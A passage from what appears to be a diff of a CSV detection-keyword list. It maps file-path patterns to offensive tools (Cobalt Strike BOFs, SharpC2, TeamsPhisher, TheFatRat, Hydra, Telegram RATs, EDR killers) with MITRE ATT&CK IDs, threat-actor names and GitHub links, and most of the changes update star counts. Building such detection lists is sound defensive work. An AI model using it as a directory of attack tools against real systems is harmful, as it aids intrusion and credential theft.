TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/tccbypass.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/tcpshell.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*/Teamphisher.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*/Teamphisher/targets.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/Teamphisher.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/Teamphisher/targets.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/teams_localdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/teamserver-linux.tar.gz*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/teamserver-win.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/teamspeak2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/teamstracker.db*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*/teamstracker.git*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*/teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.db*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.git*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*/TelegramRAT.git*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" -"*/telnet_cdata_ftth_backdoor_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/telnet_cdata_ftth_backdoor_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/telnet-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/telnet-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/telnet-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/terminate/Terminator.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*/test32.dll*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/test64.dll*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" -"*/tests/NIST_CAVS/*.rsp*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/tests/NIST_CAVS/*.rsp*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/tests/test-bof.ps1*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/tevora-threat/PowerView*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*/tftp-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -5566,17 +5627,17 @@ "*/TGSThief/*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*/tgtParse.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/tgtParse/tgtParse.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*/thc-hydra/*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*/the-backdoor-factory.git*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*/TheFatRat*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8267","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/thc-hydra/*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*/the-backdoor-factory.git*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/TheFatRat*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" "*/theHarvester.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/theHarvester.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*/ThemeBleed.exe*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*/ThemeBleed.exe*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*/thief.py*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"*/thirdparty/msf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/thirdparty/msf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/ThisIsNotRat.git*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*/thoth.git*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*/ThreadlessInject.git*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*/ThreadlessInject.git*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*/ThreatCheck.git*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*/ThunderDNS*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*/ticketConverter.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" @@ -5587,22 +5648,22 @@ "*/TikiSpawn.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 